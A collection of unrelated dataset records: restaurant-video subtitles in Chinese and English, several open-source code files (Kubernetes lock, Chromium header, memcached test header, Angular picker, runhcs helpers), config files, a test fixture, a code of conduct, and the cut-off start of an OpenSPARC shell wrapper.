我们早上基本上
We open at 10 am
正常营业是早上十点
At usual
到晚上八点
Off by 8pm
早卖完就早收
We close early when it is sold out
没有超过8点的
No later than 8pm
(固定量的呀 原来是)
Oh, a fixed amount to sell, do you mean?
一天卖多少 固定
The same amount for every day. It's fixed.
(习惯性用倒装句)
Habitual inverted sentence
早卖完就卖完了 就收摊了
Just close early when we are sold out early
没有了 就这样子
All gone, like that
(牛排200斤左右)
About 200 jin of beef rib (1 jin = 500g)
(牛肉羹差不都80多斤)
About 80 jin of beef soup
有时候六点钟 七点钟就关门了 没有了
Sometimes we close by 6 or 7pm if we are sold out early
基本上没有超过8点(关门)的
No later than 8pm, basically
一天卖两餐的 基本上晚上就没有了
We serve two meals everyday. Basically no evenings.
(就不卖了?)
No business then?
(是没有了 不说不卖)
It's sold out. Not no business
钱给我们赚 我们都是(卖东西的)
There's no way we reject money
我们这个店是家庭式的
We are a family restaurant
主要我们这个是家庭式
Because of that
只雇佣了2个工人
We only hire two workers
只雇佣了2个工人?
Only 2 workers?
加上我们一家六个人
Yeah, counting our family it is 6 workers in total
自己做 这个手艺是家庭式的
We cook by our own, with homestyle techniques
做这个牛肉就是用心去做
We cook with our heart
就做的好
That’s why our beef is delicious
我跟我儿子讲 要用心去做 做得好
I told my son to put his heart in cooking to excel
不要失传 一代传一代
Keep the inheritance, and pass it over generations
(关注 雪鱼探店)
(Subscribe)
| {
"pile_set_name": "Github"
} |
/*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package resourcelock
import (
"encoding/json"
"errors"
"fmt"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/kubernetes/pkg/api/v1"
corev1client "k8s.io/kubernetes/pkg/client/clientset_generated/clientset/typed/core/v1"
)
// TODO: This is almost a exact replica of Endpoints lock.
// going forwards as we self host more and more components
// and use ConfigMaps as the means to pass that configuration
// data we will likely move to deprecate the Endpoints lock.
type ConfigMapLock struct {
// ConfigMapMeta should contain a Name and a Namespace of an
// ConfigMapMeta object that the Leadercmlector will attempt to lead.
ConfigMapMeta metav1.ObjectMeta
Client corev1client.ConfigMapsGetter
LockConfig ResourceLockConfig
cm *v1.ConfigMap
}
// Get returns the cmlection record from a ConfigMap Annotation
func (cml *ConfigMapLock) Get() (*LeaderElectionRecord, error) {
var record LeaderElectionRecord
var err error
cml.cm, err = cml.Client.ConfigMaps(cml.ConfigMapMeta.Namespace).Get(cml.ConfigMapMeta.Name, metav1.GetOptions{})
if err != nil {
return nil, err
}
if cml.cm.Annotations == nil {
cml.cm.Annotations = make(map[string]string)
}
if recordBytes, found := cml.cm.Annotations[LeaderElectionRecordAnnotationKey]; found {
if err := json.Unmarshal([]byte(recordBytes), &record); err != nil {
return nil, err
}
}
return &record, nil
}
// Create attempts to create a LeadercmlectionRecord annotation
func (cml *ConfigMapLock) Create(ler LeaderElectionRecord) error {
recordBytes, err := json.Marshal(ler)
if err != nil {
return err
}
cml.cm, err = cml.Client.ConfigMaps(cml.ConfigMapMeta.Namespace).Create(&v1.ConfigMap{
ObjectMeta: metav1.ObjectMeta{
Name: cml.ConfigMapMeta.Name,
Namespace: cml.ConfigMapMeta.Namespace,
Annotations: map[string]string{
LeaderElectionRecordAnnotationKey: string(recordBytes),
},
},
})
return err
}
// Update will update and existing annotation on a given resource.
func (cml *ConfigMapLock) Update(ler LeaderElectionRecord) error {
if cml.cm == nil {
return errors.New("endpoint not initialized, call get or create first")
}
recordBytes, err := json.Marshal(ler)
if err != nil {
return err
}
cml.cm.Annotations[LeaderElectionRecordAnnotationKey] = string(recordBytes)
cml.cm, err = cml.Client.ConfigMaps(cml.ConfigMapMeta.Namespace).Update(cml.cm)
return err
}
// RecordEvent in leader cmlection while adding meta-data
func (cml *ConfigMapLock) RecordEvent(s string) {
events := fmt.Sprintf("%v %v", cml.LockConfig.Identity, s)
cml.LockConfig.EventRecorder.Eventf(&v1.ConfigMap{ObjectMeta: cml.cm.ObjectMeta}, v1.EventTypeNormal, "LeaderElection", events)
}
// Describe is used to convert details on current resource lock
// into a string
func (cml *ConfigMapLock) Describe() string {
return fmt.Sprintf("%v/%v", cml.ConfigMapMeta.Namespace, cml.ConfigMapMeta.Name)
}
// returns the Identity of the lock
func (cml *ConfigMapLock) Identity() string {
return cml.LockConfig.Identity
}
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef BASE_SEQUENCE_CHECKER_H_
#define BASE_SEQUENCE_CHECKER_H_
#include "base/compiler_specific.h"
#include "base/logging.h"
#include "base/sequence_checker_impl.h"
#include "base/strings/string_piece.h"
#include "build/build_config.h"
// SequenceChecker is a helper class used to help verify that some methods of a
// class are called sequentially (for thread-safety). It supports thread safety
// annotations (see base/thread_annotations.h).
//
// Use the macros below instead of the SequenceChecker directly so that the
// unused member doesn't result in an extra byte (four when padded) per
// instance in production.
//
// This class is much prefered to ThreadChecker for thread-safety checks.
// ThreadChecker should only be used for classes that are truly thread-affine
// (use thread-local-storage or a third-party API that does).
//
// Usage:
// class MyClass {
// public:
// MyClass() {
// // It's sometimes useful to detach on construction for objects that are
// // constructed in one place and forever after used from another
// // sequence.
// DETACH_FROM_SEQUENCE(my_sequence_checker_);
// }
//
// ~MyClass() {
// // SequenceChecker doesn't automatically check it's destroyed on origin
// // sequence for the same reason it's sometimes detached in the
// // constructor. It's okay to destroy off sequence if the owner
// // otherwise knows usage on the associated sequence is done. If you're
// // not detaching in the constructor, you probably want to explicitly
// // check in the destructor.
// DCHECK_CALLED_ON_VALID_SEQUENCE(my_sequence_checker_);
// }
// void MyMethod() {
// DCHECK_CALLED_ON_VALID_SEQUENCE(my_sequence_checker_);
// ... (do stuff) ...
// MyOtherMethod();
// }
//
// void MyOtherMethod()
// VALID_CONTEXT_REQUIRED(my_sequence_checker_) {
// foo_ = 42;
// }
//
// private:
// // GUARDED_BY_CONTEXT() enforces that this member is only
// // accessed from a scope that invokes DCHECK_CALLED_ON_VALID_SEQUENCE()
// // or from a function annotated with VALID_CONTEXT_REQUIRED(). A
// // DCHECK build will not compile if the member is accessed and these
// // conditions are not met.
// int foo_ GUARDED_BY_CONTEXT(my_sequence_checker_);
//
// SEQUENCE_CHECKER(my_sequence_checker_);
// }
#define SEQUENCE_CHECKER_INTERNAL_CONCAT2(a, b) a##b
#define SEQUENCE_CHECKER_INTERNAL_CONCAT(a, b) \
SEQUENCE_CHECKER_INTERNAL_CONCAT2(a, b)
#define SEQUENCE_CHECKER_INTERNAL_UID(prefix) \
SEQUENCE_CHECKER_INTERNAL_CONCAT(prefix, __LINE__)
#if DCHECK_IS_ON()
#define SEQUENCE_CHECKER(name) base::SequenceChecker name
#define DCHECK_CALLED_ON_VALID_SEQUENCE(name, ...) \
base::ScopedValidateSequenceChecker SEQUENCE_CHECKER_INTERNAL_UID( \
scoped_validate_sequence_checker_)(name, ##__VA_ARGS__);
#define DETACH_FROM_SEQUENCE(name) (name).DetachFromSequence()
#else // DCHECK_IS_ON()
#if __OBJC__ && defined(OS_IOS) && !HAS_FEATURE(objc_cxx_static_assert)
// TODO(thakis): Remove this branch once Xcode's clang has clang r356148.
#define SEQUENCE_CHECKER(name)
#else
#define SEQUENCE_CHECKER(name) static_assert(true, "")
#endif
#define DCHECK_CALLED_ON_VALID_SEQUENCE(name, ...) EAT_STREAM_PARAMETERS
#define DETACH_FROM_SEQUENCE(name)
#endif // DCHECK_IS_ON()
namespace base {
// Do nothing implementation, for use in release mode.
//
// Note: You should almost always use the SequenceChecker class (through the
// above macros) to get the right version for your build configuration.
// Note: This is only a check, not a "lock". It is marked "LOCKABLE" only in
// order to support thread_annotations.h.
class LOCKABLE SequenceCheckerDoNothing {
public:
SequenceCheckerDoNothing() = default;
// Moving between matching sequences is allowed to help classes with
// SequenceCheckers that want a default move-construct/assign.
SequenceCheckerDoNothing(SequenceCheckerDoNothing&& other) = default;
SequenceCheckerDoNothing& operator=(SequenceCheckerDoNothing&& other) =
default;
bool CalledOnValidSequence() const WARN_UNUSED_RESULT { return true; }
void DetachFromSequence() {}
private:
DISALLOW_COPY_AND_ASSIGN(SequenceCheckerDoNothing);
};
#if DCHECK_IS_ON()
class SequenceChecker : public SequenceCheckerImpl {
};
#else
class SequenceChecker : public SequenceCheckerDoNothing {
};
#endif // DCHECK_IS_ON()
class SCOPED_LOCKABLE ScopedValidateSequenceChecker {
public:
explicit ScopedValidateSequenceChecker(const SequenceChecker& checker)
EXCLUSIVE_LOCK_FUNCTION(checker) {
DCHECK(checker.CalledOnValidSequence());
}
explicit ScopedValidateSequenceChecker(const SequenceChecker& checker,
const StringPiece& msg)
EXCLUSIVE_LOCK_FUNCTION(checker) {
DCHECK(checker.CalledOnValidSequence()) << msg;
}
~ScopedValidateSequenceChecker() UNLOCK_FUNCTION() {}
private:
};
} // namespace base
#endif // BASE_SEQUENCE_CHECKER_H_
| {
"pile_set_name": "Github"
} |
net: "examples/finetune_pascal_detection/pascal_finetune_trainval_test.prototxt"
test_iter: 100
test_interval: 1000
base_lr: 0.001
lr_policy: "step"
gamma: 0.1
stepsize: 20000
display: 20
max_iter: 100000
momentum: 0.9
weight_decay: 0.0005
snapshot: 10000
snapshot_prefix: "examples/finetune_pascal_detection/pascal_det_finetune"
| {
"pile_set_name": "Github"
} |
/* -*- Mode: C; tab-width: 4; c-basic-offset: 4; indent-tabs-mode: nil -*- */
#if !defined(_dummy_memcached_h_)
#define _dummy_memcached_h_
#include "generic.h"
#include <netinet/in.h>
#include <sys/time.h>
#define V_LPRINTF(min_verbosity, string, ...) \
if (verbose >= min_verbosity) { \
fprintf(stdout, " *%s", \
&indent_str[sizeof(indent_str) - min_verbosity - 1]); \
fprintf(stdout, string, ##__VA_ARGS__); \
} \
#define V_PRINTF(min_verbosity, string, ...) if (verbose >= min_verbosity) fprintf(stdout, string, ##__VA_ARGS__)
#define V_FLUSH(min_verbosity) if (verbose >= min_verbosity) fflush(stdout)
#if defined(DEBUG)
#define TASSERT(expr, ...) if (! (expr)) { if (verbose) { printf("assertion failed(%d): %s", __LINE__, #expr); printf("\n" __VA_ARGS__); } assert(0); }
#else
#define TASSERT(expr, ...) if (! (expr)) { if (verbose) { printf("assertion failed(%d): %s", __LINE__, #expr); printf("\n" __VA_ARGS__); } return 1; }
#endif /* #if defined(DEBUG) */
extern const char indent_str[257];
#if defined(INIT_TEST)
#include "init_test.h"
#endif /* #if defined(INIT_TEST) */
#if defined(INLINE_TEST)
#include "inline_test.h"
#endif /* #if defined(INLINE_TEST) */
#if defined(ALLOC_DEALLOC_TEST)
#include "alloc_dealloc_test.h"
#endif /* #if defined(ALLOC_DEALLOC_TEST) */
#if defined(ITEM_WALK_TEST)
#include "item_walk_test.h"
#endif /* #if defined(ITEM_WALK_TEST) */
#if defined(PAGING_TEST)
#include "paging_test.h"
#endif /* #if defined(PAGING_TEST) */
#if defined(ASSOC_TEST)
#include "assoc_test.h"
#endif /* #if defined(ASSOC_TEST) */
#if defined(ALLOC_LARGE_LRU_EVICT_TEST)
#include "alloc_large_lru_evict_test.h"
#endif /* #if defined(ALLOC_LARGE_LRU_EVICT_TEST) */
#if defined(ALLOC_SMALL_LRU_EVICT_TEST)
#include "alloc_small_lru_evict_test.h"
#endif /* #if defined(ALLOC_SMALL_LRU_EVICT_TEST) */
#if defined(COMPLEX_ALLOC_TEST)
#include "complex_alloc_test.h"
#endif /* #if defined(COMPLEX_ALLOC_TEST) */
#if !defined(MAX_ITEM_SIZE)
#define MAX_ITEM_SIZE (1024 * 1024)
#endif /* #if !defined(MAX_ITEM_SIZE) */
#if !defined(KEY_MAX_LENGTH)
#define KEY_MAX_LENGTH 255
#endif /* #if !defined(KEY_MAX_LENGTH) */
/*
* We only reposition items in the LRU queue if they haven't been repositioned
* in this many seconds. That saves us from churning on frequently-accessed
* items.
*/
#if !defined(ITEM_UPDATE_INTERVAL)
#define ITEM_UPDATE_INTERVAL 60
#endif /* #if !defined(ITEM_UPDATE_INTERVAL) */
#if !defined(MAX_KEYS)
#define MAX_KEYS (16 * 1024)
#endif /* #if !defined(MAX_KEYS) */
#if !defined(item_get_notedeleted)
#define item_get_notedeleted do_item_get_notedeleted
#endif /* #if !defined(item_get_notedeleted) */
#if !defined(stats_prefix_record_removal)
#define stats_prefix_record_removal(a, b, c, d, e) ;
#endif /* #if !defined(stats_prefix_record_removal) */
#if !defined(stats_evict)
#define stats_evict(a) ;
#endif /* #if !defined(stats_evict) */
#if !defined(stats_expire)
#define stats_expire(a) ;
#endif /* #if !defined(stats_expire) */
#if !defined(TOTAL_MEMORY)
#define TOTAL_MEMORY (4 * 1024 * 1024)
#endif /* #if !defined(TOTAL_MEMORY) */
#if !defined(FLAGS)
#define FLAGS 0xdeadbeef
#endif /* #if !defined(FLAGS) */
#if !defined(KEY)
#define KEY "abcde"
#endif /* #if !defined(KEY) */
#define ITEM_CACHEDUMP_LIMIT (2 * 1024 * 1024)
#define ITEM_STATS_SIZES (2 * 1024 * 1024)
#include "items.h"
#include "conn_buffer.h"
typedef struct conn_s conn;
struct conn_s {
conn_buffer_group_t* cbg;
bool binary;
struct iovec* riov; /* read iov */
size_t riov_size; /* number of read iovs allocated */
size_t riov_curr; /* current read iov being sent */
size_t riov_left; /* number of read iovs left to send */
char crlf[2]; /* used to receive cr-lfs from the ascii protocol. */
};
typedef struct stats_s stats_t;
struct stats_s {
unsigned int curr_items;
unsigned int total_items;
uint64_t item_storage_allocated;
uint64_t item_total_size;
unsigned int curr_conns;
unsigned int total_conns;
unsigned int conn_structs;
uint64_t get_cmds;
uint64_t set_cmds;
uint64_t get_hits;
uint64_t get_misses;
uint64_t evictions;
time_t started; /* when the process was started */
uint64_t bytes_read;
uint64_t bytes_written;
#define MEMORY_POOL(pool_enum, pool_counter, pool_string) uint64_t pool_counter;
#include "memory_pool_classes.h"
struct {
#define MEMORY_POOL(pool_enum, pool_counter, pool_string) uint64_t pool_counter;
#include "memory_pool_classes.h"
} mp_bytecount_errors_realloc_split;
struct {
#define MEMORY_POOL(pool_enum, pool_counter, pool_string) uint64_t pool_counter;
#include "memory_pool_classes.h"
} mp_bytecount_errors_free_split;
};
typedef struct settings_s settings_t;
struct settings_s {
size_t maxbytes;
int maxconns;
int port;
int udpport;
int binary_port;
int binary_udpport;
struct in_addr interf;
int verbose;
rel_time_t oldest_live; /* ignore existing items older than this */
bool managed; /* if 1, a tracker manages virtual buckets */
int evict_to_free;
char *socketpath; /* path to unix socket if using local socket */
double factor; /* chunk size growth factor */
int chunk_size;
int num_threads; /* number of libevent threads to run */
char prefix_delimiter; /* character that marks a key prefix (for stats) */
int detail_enabled; /* nonzero if we're collecting detailed stats */
};
extern settings_t settings;
extern rel_time_t current_time;
extern stats_t stats;
static inline int add_iov(conn* c, const void* ptr, const size_t size, bool is_first) { return 0; }
typedef struct {
const item* it;
} find_in_lru_context_t;
typedef bool (*find_in_lru_funcptr_t) (const item* const item_to_be_tested,
find_in_lru_context_t context);
extern bool find_in_lru_by_item_comparator(const item* item_to_be_tested, find_in_lru_context_t context);
extern const item* find_in_lru_by_funcptr(find_in_lru_funcptr_t comparator,
find_in_lru_context_t context);
extern int check_lru_order(const item* item1, const item* item2);
extern int make_random_key(char* key, size_t key_size, bool max);
static inline const item* find_in_lru_by_item(const item* item_to_be_found) {
find_in_lru_context_t temp;
temp.it = item_to_be_found;
return find_in_lru_by_funcptr(find_in_lru_by_item_comparator,
temp);
}
size_t append_to_buffer(char* const buffer_start,
const size_t buffer_size,
const size_t buffer_off,
const size_t reserved,
const char* fmt,
...);
/* declaration of tests. */
typedef int (*tester_f)(int);
typedef struct {
tester_f func;
int is_fast;
} tester_info_t;
extern bool fa_freelist_check(const chunk_type_t ctype);
extern bool lru_check(void);
extern bool item_chunk_check(const item* it);
extern int verify_key(const item* it, const char* key);
#define STATS_LOCK() ;
#define STATS_UNLOCK() ;
#include "memory_pool.h"
#endif /* #if !defined(_dummy_memcached_h_) */
| {
"pile_set_name": "Github"
} |
# flake8: noqa
GKE_RESPONSE = {
'clusters': [{
'selfLink': 'https://container.googleapis.com/v1/projects/test-cluster/locations/europe-west2/clusters/test-cluster',
'createTime': '2019-01-01T00:00:00+00:00',
'name': 'test-cluster',
'description': 'Test cluster',
'loggingService': 'logging.googleapis.com',
'monitoringService': 'none',
'network': 'test-cluster',
'subnetwork': 'test-cluster',
'clusterIpv4Cidr': '0.0.0.0/14',
'zone': 'europe-west2',
'location': 'europe-west2',
'endpoint': '0.0.0.0',
'initialClusterVersion': '1.12.10-gke.15',
'currentMasterVersion': '1.14.10-gke.27',
'status': 'RUNNING',
'servicesIpv4Cidr': '0.0.0.0/15',
'databaseEncryption': {
'state': 'DECRYPTED',
},
'locations': [
'europe-west2-c',
'europe-west2-b',
'europe-west2-a',
],
'networkPolicy': {
'provider': 'CALICO',
'enabled': True,
},
'maintenancePolicy': {
'window': {
'dailyMaintenanceWindow': {
'startTime': '01:00',
'duration': 'PT4H0M0S',
},
},
'resourceVersion': '111111',
},
'defaultMaxPodsConstraint': {
'maxPodsPerNode': '10',
},
'masterAuthorizedNetworksConfig': {
'enabled': True,
},
'networkConfig': {
'network': 'projects/test-cluster/global/networks/test-cluster',
'subnetwork': 'projects/test-cluster/regions/europe-west2/subnetworks/test-cluster',
},
'addonsConfig': {
'httpLoadBalancing': {
'disabled': True,
},
'horizontalPodAutoscaling': {
'disabled': True,
},
'kubernetesDashboard': {
'disabled': True,
},
'networkPolicyConfig': {},
},
'legacyAbac': {},
'shieldedNodes': {},
'ipAllocationPolicy': {
'useIpAliases': True,
'clusterIpv4Cidr': '0.0.0.0/14',
'servicesIpv4Cidr': '0.0.0.0/15',
'clusterSecondaryRangeName': 'pods',
'servicesSecondaryRangeName': 'services',
'clusterIpv4CidrBlock': '0.0.0.0/14',
'servicesIpv4CidrBlock': '0.0.0.0/15',
},
'privateClusterConfig': {
'enablePrivateNodes': True,
'enablePrivateEndpoint': True,
'masterIpv4CidrBlock': '0.0.0.0/28',
'privateEndpoint': '0.0.0.0',
'publicEndpoint': '0.0.0.0',
'peeringName': 'gke-111111-1111-1111-peer',
},
'masterAuth': {
'clusterCaCertificate': '11111',
},
'nodePools': [{
'name': 'default-111-111-111-111-gke-17',
'config': {
'machineType': 'n1-standard-8',
'diskSizeGb': 50,
'oauthScopes': [
'https://www.googleapis.com/auth/compute',
],
'metadata': {
'disable-legacy-endpoints': 'true',
},
'imageType': 'COS',
'tags': ['default-node'],
'serviceAccount':
'[email protected]',
'diskType': 'pd-standard',
'shieldedInstanceConfig': {
'enableIntegrityMonitoring': True,
},
},
'initialNodeCount': 2,
'management': {
'autoRepair': True,
},
'maxPodsConstraint': {
'maxPodsPerNode': '10',
},
'podIpv4CidrSize': 24,
'locations': [
'europe-west2-c',
'europe-west2-b',
'europe-west2-a',
],
'selfLink': 'https://container.googleapis.com/v1/projects/test-cluster/locations/europe-west2/clusters/test-cluster/nodePools/default-111-111-111-111-gke-17',
'version': '1.14.10-gke.17',
'instanceGroupUrls': [
'https://www.googleapis.com/compute/v1/projects/test-cluster/zones/europe-west2-a/instanceGroupManagers/gke-gcp-111-111-111-111-1-1-111-111',
],
'status': 'RUNNING',
}],
}],
}
| {
"pile_set_name": "Github"
} |
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<Description>App Metrics App Metapackage - Contains all features for an AspNetCore application.</Description>
<AssemblyTitle>App.Metrics.AspNetCore.All</AssemblyTitle>
<TargetFrameworks>netstandard2.0;netcoreapp3.1</TargetFrameworks>
<PackageTags>appmetrics;aspnetcore;metrics</PackageTags>
</PropertyGroup>
<ItemGroup>
<PackageReference Include="App.Metrics.Extensions.Collectors" />
<PackageReference Include="App.Metrics.Extensions.Configuration" />
<PackageReference Include="App.Metrics.Extensions.DependencyInjection" />
<PackageReference Include="App.Metrics.Extensions.Hosting" />
<PackageReference Include="App.Metrics.AspNetCore" />
<PackageReference Include="App.Metrics.AspNetCore.Endpoints" />
<PackageReference Include="App.Metrics.AspNetCore.Hosting" />
<PackageReference Include="App.Metrics.AspNetCore.Mvc" />
<PackageReference Include="App.Metrics.AspNetCore.Routing" />
<PackageReference Include="App.Metrics.AspNetCore.Tracking" />
<PackageReference Include="App.Metrics.Extensions.HealthChecks" />
<PackageReference Include="App.Metrics.Formatters.Json" />
</ItemGroup>
</Project>
| {
"pile_set_name": "Github"
} |
import {
ChangeDetectionStrategy,
Component,
EventEmitter,
forwardRef,
Input,
OnDestroy,
Output,
ViewChild,
ViewEncapsulation,
} from '@angular/core';
import { ControlValueAccessor, NG_VALUE_ACCESSOR } from '@angular/forms';
import { PickerBaseComponent } from './picker-base.component';
import { PickerComponent } from './picker.component';
import { PickerChangeData, PickerCityData, PickerCityDataMap, PickerGroupChange } from './picker.types';
const DATA_MAP: PickerCityDataMap = {
label: 'name',
value: 'code',
items: 'sub',
};
/**
* 城市选择器(并不包含城市数据,可以参考示例中的数据格式)
*/
@Component({
selector: 'weui-city-picker',
exportAs: 'weuiCityPicker',
template: `
<weui-picker
[placeholder]="placeholder"
[groups]="_groups!"
[defaultSelect]="_selected"
[disabled]="disabled"
[title]="title"
[options]="options"
(show)="_onShow()"
(hide)="_onHide()"
(change)="_onChange($event)"
(groupChange)="_onGroupChange($event)"
(cancel)="_onCityCancelChange()"
></weui-picker>
`,
providers: [
{
provide: NG_VALUE_ACCESSOR,
useExisting: forwardRef(() => CityPickerComponent),
multi: true,
},
],
preserveWhitespaces: false,
changeDetection: ChangeDetectionStrategy.OnPush,
encapsulation: ViewEncapsulation.None,
})
export class CityPickerComponent extends PickerBaseComponent implements ControlValueAccessor, OnDestroy {
@Input()
set dataMap(val: PickerCityDataMap) {
this._dataMap = {
...DATA_MAP,
...val,
};
}
@Input()
set data(d: PickerCityData[]) {
this._tmpData = d;
this.parseData(this._tmpData, this._dataMap.items, this._selected);
}
@ViewChild(PickerComponent, { static: true }) private readonly pickerComp: PickerComponent;
@Output() readonly change = new EventEmitter<PickerChangeData>();
private _tmpData: PickerCityData[] | null = null;
private _dataMap = DATA_MAP;
_value: string;
_groups: PickerCityData[][] | null = [];
_selected: number[] = [];
private onChange = (_: string) => {};
private onTouched = () => {};
private parseData(
data: PickerCityData[],
subKey: string,
selected: number[] = [],
group: PickerCityData[][] = [],
newSelected: number[] = [],
): { groups: PickerCityData[][]; newSelected: number[] } {
let _selected = 0;
if (Array.isArray(selected) && selected.length > 0) {
const _selectedClone = selected.slice(0);
_selected = _selectedClone.shift()!;
selected = _selectedClone;
}
if (typeof data[_selected] === 'undefined') {
_selected = 0;
}
newSelected.push(_selected);
const item = data[_selected];
const _group = JSON.parse(JSON.stringify(data)) as PickerCityData[];
const map = this._dataMap;
_group.forEach((g: PickerCityData) => {
delete g[subKey];
g.label = g[map.label];
g.value = g[map.value];
});
group.push(_group);
if (typeof item[subKey] !== 'undefined' && Array.isArray(item[subKey])) {
return this.parseData(item[subKey], subKey, selected, group, newSelected);
} else {
this._groups = group;
this._selected = newSelected;
return { groups: group, newSelected };
}
}
/**
* 将值转换成位置
*/
private valueToSelect(data: PickerCityData[], subKey: string, dept: number = 1, newSelected: number[] = []): number[] {
const code = (this._value.substr(0, dept * 2) + '0000').substr(0, 6);
let _selected = data.findIndex((w: PickerCityData) => w[this._dataMap.value] === code);
if (_selected <= -1) {
_selected = 0;
}
newSelected.push(_selected);
const item = data[_selected];
if (typeof item[subKey] !== 'undefined' && Array.isArray(item[subKey])) {
return this.valueToSelect(item[subKey], subKey, ++dept, newSelected);
} else {
this._selected = newSelected;
setTimeout(() => {
this.pickerComp._setText();
}, 100);
return newSelected;
}
}
_onChange(data: PickerChangeData): void {
this.onChange(data.value);
this.onTouched();
this.change.emit(data);
}
_onGroupChange(res: PickerGroupChange): void {
this._selected[res.groupIndex] = res.index;
if (res.groupIndex !== 2) {
this.parseData(this._tmpData!, this._dataMap.items, this._selected);
}
this.groupChange.emit(res);
}
_onCityCancelChange(): void {
this.cancel.emit();
}
/** 服务于Service,并无实际意义 */
_triggerShow(): void {
this.pickerComp._onShow();
}
_onShow(): void {
this.show.emit();
}
_onHide(): void {
this.hide.emit();
}
writeValue(value: string): void {
if (!value) {
this.pickerComp._text = '';
return;
}
this._value = value;
if (this._value && this._value.length === 6) {
const items = this._dataMap.items;
this.valueToSelect(this._tmpData!, items, 1);
this.parseData(this._tmpData!, items, this._selected);
}
}
registerOnChange(fn: (_: string) => {}): void {
this.onChange = fn;
}
registerOnTouched(fn: () => {}): void {
this.onTouched = fn;
}
setDisabledState(isDisabled: boolean): void {
this.disabled = isDisabled;
}
ngOnDestroy(): void {
this._tmpData = null;
this._groups = null;
}
}
| {
"pile_set_name": "Github"
} |
package runhcs
import "net/url"
const (
SafePipePrefix = `\\.\pipe\ProtectedPrefix\Administrators\`
)
// ShimSuccess is the byte stream returned on a successful operation.
var ShimSuccess = []byte{0, 'O', 'K', 0}
func SafePipePath(name string) string {
// Use a pipe in the Administrators protected prefixed to prevent malicious
// squatting.
return SafePipePrefix + url.PathEscape(name)
}
| {
"pile_set_name": "Github"
} |
# Contributor Covenant Code of Conduct
## Our Pledge
In the interest of fostering an open and welcoming environment, we as
contributors and maintainers pledge to making participation in our project and
our community a harassment-free experience for everyone, regardless of age, body
size, disability, ethnicity, gender identity and expression, level of experience,
nationality, personal appearance, race, religion, or sexual identity and
orientation.
## Our Standards
Examples of behavior that contributes to creating a positive environment
include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community
* Showing empathy towards other community members
Examples of unacceptable behavior by participants include:
* The use of sexualized language or imagery and unwelcome sexual attention or
advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic
address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a
professional setting
## Our Responsibilities
Project maintainers are responsible for clarifying the standards of acceptable
behavior and are expected to take appropriate and fair corrective action in
response to any instances of unacceptable behavior.
Project maintainers have the right and responsibility to remove, edit, or
reject comments, commits, code, wiki edits, issues, and other contributions
that are not aligned to this Code of Conduct, or to ban temporarily or
permanently any contributor for other behaviors that they deem inappropriate,
threatening, offensive, or harmful.
## Scope
This Code of Conduct applies both within project spaces and in public spaces
when an individual is representing the project or its community. Examples of
representing a project or community include using an official project e-mail
address, posting via an official social media account, or acting as an appointed
representative at an online or offline event. Representation of a project may be
further defined and clarified by project maintainers.
## Enforcement
Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported by contacting the project team at [email protected]. All
complaints will be reviewed and investigated and will result in a response that
is deemed necessary and appropriate to the circumstances. The project team is
obligated to maintain confidentiality with regard to the reporter of an incident.
Further details of specific enforcement policies may be posted separately.
Project maintainers who do not follow or enforce the Code of Conduct in good
faith may face temporary or permanent repercussions as determined by other
members of the project's leadership.
## Attribution
This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
available at [http://contributor-covenant.org/version/1/4][version]
[homepage]: http://contributor-covenant.org
[version]: http://contributor-covenant.org/version/1/4/
| {
"pile_set_name": "Github"
} |
#! /bin/sh
# Modified by Princeton University on April 3, 2016
# ========== Copyright Header Begin ==========================================
#
# OpenSPARC T1 Processor File: rsyn
# Copyright (c) 2006 Sun Microsystems, Inc. All Rights Reserved.
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES.
#
# The above named program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public
# License version 2 as published by the Free Software Foundation.
#
# The above named program is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with this work; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ========== Copyright Header End ============================================
#
# SCCS ID: @(#).perl_wrapper 1.1 02/03/99
#
# Cloned from .common_tool_wrapper
loginfo () {
echo "DATE: "`date`
echo "WRAPPER: $TRE_PROJECT/tools/bin/perl_wrapper"
echo "USER: "$user
echo "HOST: "`uname -n`
echo "SYS: "`uname -s` `uname -r`
echo "PWD: "`pwd`
echo "ARGV: "$ARGV
echo "TOOL: "$tool
echo "VERSION: "$version
echo "TRE_SEARCH: "$TRE_SEARCH
echo "TRE_ENTRY: "$TRE_ENTRY
}
mailinfo () {
echo To: $1
echo Subject: TRE_LOG
echo "#"
loginfo
}
mailerr () {
echo "To: $1"
echo "Subject: TRE ERROR"
echo "#"
echo "ERROR: $2"
loginfo
}
log () {
# Log to TRE_LOG if it is set properly.
# It is STRONGLY recommended that TRE_LOG be an e-mail address
# in order to avoid problems with several people simultanously
# writing to the same file.
# TRE_LOG must be set, but it can be broken.
# TRE_ULOG is optional, for users who want their own logging.
if [ ! -z "$TRE_LOG_ENABLED" ] ; then
if [ ! -z "$TRE_LOG" ] ; then
# Check first if TRE_LOG is a file (this is cheap).
if [ -f $TRE_LOG -a -w $TRE_LOG ] ; then
echo "#" >> $TRE_LOG
loginfo >> $TRE_LOG
elif /usr/lib/sendmail -bv $TRE_LOG 1>&- 2>&- ; then
mailinfo $TRE_LOG | /usr/lib/sendmail $TRE_LOG
else
